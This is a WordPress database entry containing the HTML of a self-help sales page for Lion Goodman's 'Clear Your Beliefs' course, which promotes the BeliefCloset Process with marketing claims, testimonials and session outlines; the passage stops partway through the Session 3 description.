(916, 4194, '2014-06-17 13:20:49', '2014-06-17 18:20:49', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="wp-image-300 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt">Delete Blocks &amp; Limitations</h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt">Allow More Success &amp; Joy</h5>\r\n<img class="wp-image-316 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt">Simply CLEAR Your Beliefs!</h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 50px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n<span style="color: #ff0000;"><strong>Your "limitations" were createdby your beliefs.\r\nWhen you learn to change your beliefs at will, your possibilities are unlimited!</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n</div>\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\r\n\r\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\r\n\r\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\nDuring the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n\r\n&nbsp;\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter 